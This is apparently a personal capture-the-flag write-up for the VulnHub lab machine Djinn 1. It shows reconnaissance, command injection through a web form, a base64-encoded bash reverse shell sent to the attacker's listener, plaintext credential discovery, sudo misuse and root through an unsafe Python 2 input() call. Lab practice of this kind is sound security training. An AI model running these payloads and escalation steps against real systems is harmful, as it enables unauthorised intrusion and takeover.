VulnHub : Djinn 1
5 June, 2021
Machine Link: https://www.vulnhub.com/entry/djinn-1,397/
Starting with an nmap scan
$ sudo nmap -A -sC -sV -O -p 1-20000 192.168.56.127
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-05 04:38 EDT
Nmap scan report for 192.168.56.127
Host is up (0.0015s latency).
Not shown: 19996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.103
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '/', 5)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '-', 8)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=6/5%Time=60BB381E%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x
SF:20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20_
SF:_\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x2
SF:0`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x
SF:20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x
SF:20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\
SF:nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20y
SF:ou\x20your\x20gift\.\n\(8,\x20'/',\x205\)\n>\x20")%r(RPCCheck,1BC,"\x20
SF:\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x2
SF:0__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x2
SF:0\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x2
SF:0\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20
SF:\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\__
SF:_\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x20
SF:see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x20
SF:my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your\
SF:x20gift\.\n\(1,\x20'-',\x208\)\n>\x20");
MAC Address: 08:00:27:B6:9D:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 1.50 ms 192.168.56.127
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.42 seconds
Let's look at FTP first, it allows anonymous login and has 3 files
# ftp 192.168.56.127
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
One file contained credentials
# cat creds.txt
nitu:81299
# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
Moving on to the port 7331, the website didn't give any clues so I ran gobuster against it and found two paths
/wish (Status: 200) [Size: 385]
/genie (Status: 200) [Size: 1676]
# curl 192.168.56.127:7331/wish
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Make wishes</title>
</head>
<body>
<form method="POST" action="/wish">
<p>Oh you found me then go on make a wish.</p>
<p>This can make all your wishes come true</p>
Execute: <input type="text" name="cmd" required><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
# curl -X POST 192.168.56.127:7331/wish -d 'cmd=whoami'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/genie?name=www-data%0A">/genie?name=www-data%0A</a>. If not click the link.
# curl -X POST 192.168.56.127:7331/wish -d 'cmd=pwd'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/genie?name=%2Fopt%2F80%0A">/genie?name=%2Fopt%2F80%0A</a>. If not click the link.
This was clearly RCE, so I tried to get a reverse shell but it didn't work
# curl -X POST 192.168.56.127:7331/wish -d 'cmd=%2Fbin%2Fbash%20-i%20%3E&%20/dev/tcp/192.168.56.127/4242%200%3E&1'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/genie?name=Wrong+choice+of+words">/genie?name=Wrong+choice+of+words</a>. If not click the link.
One way of hiding the original command is base64 encoding, so after trying out a number of payloads, this worked
# echo "bash -i >& /dev/tcp/192.168.56.103/4242 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80MjQyIDA+JjEK
# curl 'http://192.168.56.127:7331/wish' -d 'cmd=echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80MjQyIDA%2BJjEK%7Cbase64+-d%7Cbash'
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.127] 51064
bash: cannot set terminal process group (679): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$ whoami
whoami
www-data
www-data@djinn:/opt/80$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash
Inside nitish's home I found some credentials
www-data@djinn:/home/nitish$ ls -ltrha
ls -ltrha
total 32K
drwxr-xr-x 2 nitish nitish 4.0K Oct 21 2019 .dev
drwx------ 3 nitish nitish 4.0K Nov 11 2019 .gnupg
drwx------ 2 nitish nitish 4.0K Nov 11 2019 .cache
-rw-r--r-- 1 nitish nitish 3.7K Nov 11 2019 .bashrc
-rw------- 1 root root 130 Nov 12 2019 .bash_history
-rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt
drwxr-xr-x 5 nitish nitish 4.0K Nov 12 2019 .
drwxr-xr-x 4 root root 4.0K Nov 14 2019 ..
www-data@djinn:/home/nitish$ cd .dev
cd .dev
www-data@djinn:/home/nitish/.dev$ ls
ls
creds.txt
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~/.dev$ whoami
whoami
nitish
nitish@djinn:~/.dev$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish was allowed to run /usr/bin/genie as sam
nitish@djinn:/home$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
nitish@djinn:/home$ sudo -u sam /usr/bin/genie
sudo -u sam /usr/bin/genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:/home$ sudo -u sam /usr/bin/genie pwd
sudo -u sam /usr/bin/genie pwd
You are a noob hacker!!
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -p /bin/bash id
sudo -u sam /usr/bin/genie -p /bin/bash id
#
ping: google.com: Temporary failure in name resolution
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -h
sudo -u sam /usr/bin/genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
I couldn't get anywhere with genie so I went back to the nmap scan and looked at port 1337. The directory for port 1337 was owned by root, and the process was a python app, so maybe I could find something that can lead to privesc I thought.
www-data@djinn:/opt$ ls -ltrha
ls -ltrha
total 16K
drwxr-xr-x 23 root root 4.0K Nov 11 2019 ..
drwxr-xr-x 4 root root 4.0K Nov 14 2019 .
drwxr-xr-x 4 www-data www-data 4.0K Nov 17 2019 80
drwx------ 2 root root 4.0K Nov 17 2019 1337
root 22304 0.0 0.3 21340 3560 ? Ss 17:49 0:00 /bin/bash /opt/1337/run_challenge.sh
root 22305 0.8 1.8 58184 18672 ? S 17:49 0:00 python -u /opt/1337/app.py
$ nc 192.168.56.127 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '/', 1)
> 'import os; os.system("pwd")'
Stop acting like a hacker for a damn minute!!
I couldn't get past the filters here as well so I went back to the genie binary and happened to check the man page
-cmd
You know sometime all you new is a damn CMD, windows I love you.
Using this option I was able to get a shell as sam
nitish@djinn:/opt/80$ sudo -u sam /usr/bin/genie -cmd id
sudo -u sam /usr/bin/genie -cmd id
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
sam was also allowed to run something as root
sam@djinn:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo /root/lago
sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
3
Enter the full of the file to read: /root/root.txt
/root/root.txt
Slow clap for this hacker right here
Noticed a pyc file in sam's home directory
-rw-r--r-- 1 sam sam 1.8K Nov 7 2019 .pyc
sam@djinn:/home/sam$ strings .pyc
strings .pyc
getuser(
system(
randintc
Working on it!! (
/home/mzfr/scripts/exp.pyt
naughtyboi
Choose a number between 1 to 100: s
Enter your number: s
/bin/shs
Better Luck next time(
inputR
numt
/home/mzfr/scripts/exp.pyt
guessit
Enter the full of the file to read: s!
User %s is not allowed to read %s(
usert
path(
/home/mzfr/scripts/exp.pyt
readfiles
What do you want to do ?s
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice: (
intR
choice(
/home/mzfr/scripts/exp.pyt
options
work your ass off!!s"
Do something better with your life(
/home/mzfr/scripts/exp.pyt
main'
__main__N(
getpassR
randomR
__name__(
/home/mzfr/scripts/exp.pyt
<module>
Looks like it is the same file as /root/lago. I used uncompyle6 to uncompile the pyc to python
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 19:51:05)
# [GCC 9.2.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 13:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
# okay decompiling .pyc
Looks the guessing game input doesn't typecast the input to an integer.
sam@djinn:/home/sam$ sudo /root/lago
sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
lago proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Sat Jun 5 20:02:14 IST 2021
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
After reading around on the internet, I found out that with a specific input the application on 1337 would also give a shell, its called python's sandbox escape https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes#executing-python-code